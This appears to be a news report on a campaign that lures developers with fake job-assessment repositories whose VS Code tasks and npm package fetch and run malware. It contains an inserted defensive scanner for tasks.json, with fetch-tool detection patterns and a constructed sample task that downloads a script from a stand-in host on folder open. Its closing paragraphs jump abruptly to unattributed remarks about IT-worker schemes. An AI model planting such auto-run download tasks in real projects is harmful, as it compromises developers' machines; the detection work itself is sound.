Malicious repositories masquerading as authentic Next.js projects and technical evaluations are being used in a "coordinated developer-targeting campaign" to fool victims into running them and gain ongoing access to compromised computers. In a report released this week, the Microsoft Defender Security Research Team stated, "The activity aligns with a broader cluster of threats that use job-themed lures to blend into routine developer workflows and increase the likelihood of code execution." The campaign, according to the tech giant, is distinguished by the use of several entry points that result in the same outcome, where attacker-controlled JavaScript is retrieved at runtime and executed to enable command-and-control (C2).

The attacks rely on threat actors creating phony repositories with names like "Cryptan-Platform-MVP1" on trusted developer platforms such as Bitbucket in order to fool job seekers into completing a supposed assessment. Further examination of the discovered repositories revealed three execution paths that, although initiated in different ways, all aim to run attacker-controlled JavaScript directly in memory. One is Visual Studio Code workspace execution, in which a Microsoft Visual Studio Code (VS Code) project carrying workspace automation configuration executes malicious code retrieved from a Vercel domain as soon as the developer opens and trusts the project. Another method hides the Vercel URLs behind URL shorteners such as short[.]gy.
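A defender-side check for the workspace-automation path described above, added here as an example (it is not code from the Microsoft report): it parses a repository's .vscode/tasks.json (JSONC, so comments and trailing commas are stripped first) and flags tasks that are configured to run on folder open, invoke a download or decode helper, or reference the hosting services the report names. The sample tasks.json and the example-lure host in it are constructed.

```python
import json
import re

# Indicators taken from the report: tasks that auto-run on folder open, commands that
# fetch or decode remote content (certutil included), and the hosting services named.
FETCH = re.compile(r"\b(curl|wget|iwr|Invoke-WebRequest|certutil\s+-(urlcache|decode))\b", re.I)
SUSPECT_HOSTS = ("vercel.app", "short.gy")

# Matches, left to right: a JSON string literal (kept), a // or /* */ comment
# (dropped), or a trailing comma before } or ] (dropped). Strings are matched first,
# so a "//" inside a URL string is never mistaken for a comment.
_TOKEN = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/|,(?=\s*[}\]])', re.S)

def strip_jsonc(text):
    """tasks.json is JSONC; reduce it to plain JSON for the standard json module."""
    return _TOKEN.sub(lambda m: m.group(0) if m.group(0).startswith('"') else "", text)

def scan_tasks(text):
    """Return one finding per task that auto-runs, fetches, or touches a suspect host."""
    findings = []
    for task in json.loads(strip_jsonc(text)).get("tasks", []):
        # args may be plain strings or {"value": ..., "quoting": ...} objects
        args = [a if isinstance(a, str) else a.get("value", "") for a in task.get("args", [])]
        cmd = " ".join([str(task.get("command", ""))] + args)
        auto = task.get("runOptions", {}).get("runOn") == "folderOpen"
        hosts = [h for h in SUSPECT_HOSTS if h in cmd.lower()]
        if auto or FETCH.search(cmd) or hosts:
            findings.append({"label": task.get("label", "<unnamed>"), "auto_run": auto,
                             "remote_fetch": bool(FETCH.search(cmd)), "suspect_hosts": hosts})
    return findings

# Constructed sample resembling a lure project's .vscode/tasks.json (not a real IoC).
SAMPLE = r'''{
  "version": "2.0.0",  // comment and trailing commas are legal in VS Code's JSONC
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "setup", "type": "shell",
     "command": "curl -sL https://example-lure.vercel.app/setup.js -o /tmp/setup.js",
     "runOptions": {"runOn": "folderOpen"},},
  ]
}'''

if __name__ == "__main__":
    for f in scan_tasks(SAMPLE):
        print(f)
```

Workspace Trust is the control this path depends on: a task with runOn set to folderOpen does not fire until the developer trusts the folder, so flagging such tasks before trust is granted is the point of the check.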

The cybersecurity firm reported that it also discovered the malicious npm package "eslint-validator", which is connected to the campaign and retrieves and executes an obfuscated payload from a Google Drive URL. The payload in question is BeaverTail, a well-known JavaScript malware. A malicious VS Code task embedded in a GitHub repository has also been found to start a Windows-only infection chain: a batch script downloads a Node.js runtime to the host (if one is not already present) and uses the certutil utility to decode a code block embedded in the script.

Once the script has been decoded, PyArmor-protected Python malware is deployed using the previously acquired Node.js runtime.

"A high degree of operational resiliency and money laundering flexibility is provided by this cell's demonstrated ability to cultivate facilitators globally." In a report released earlier this month, Okta stated that the "vast majority" of IT worker interviews end without a follow-up interview or job offer, but that the workers are "learning from their mistakes" and that many seek temporary contract work as software developers hired out to third-party companies, taking advantage of the fact that such companies are unlikely to enforce stringent background checks. It also stated that "some actors seem to be more competent at crafting personas and passing screening interviews."

There is a sort of natural selection for IT workers.

The most successful actors set up hundreds of interviews each and are extremely prolific.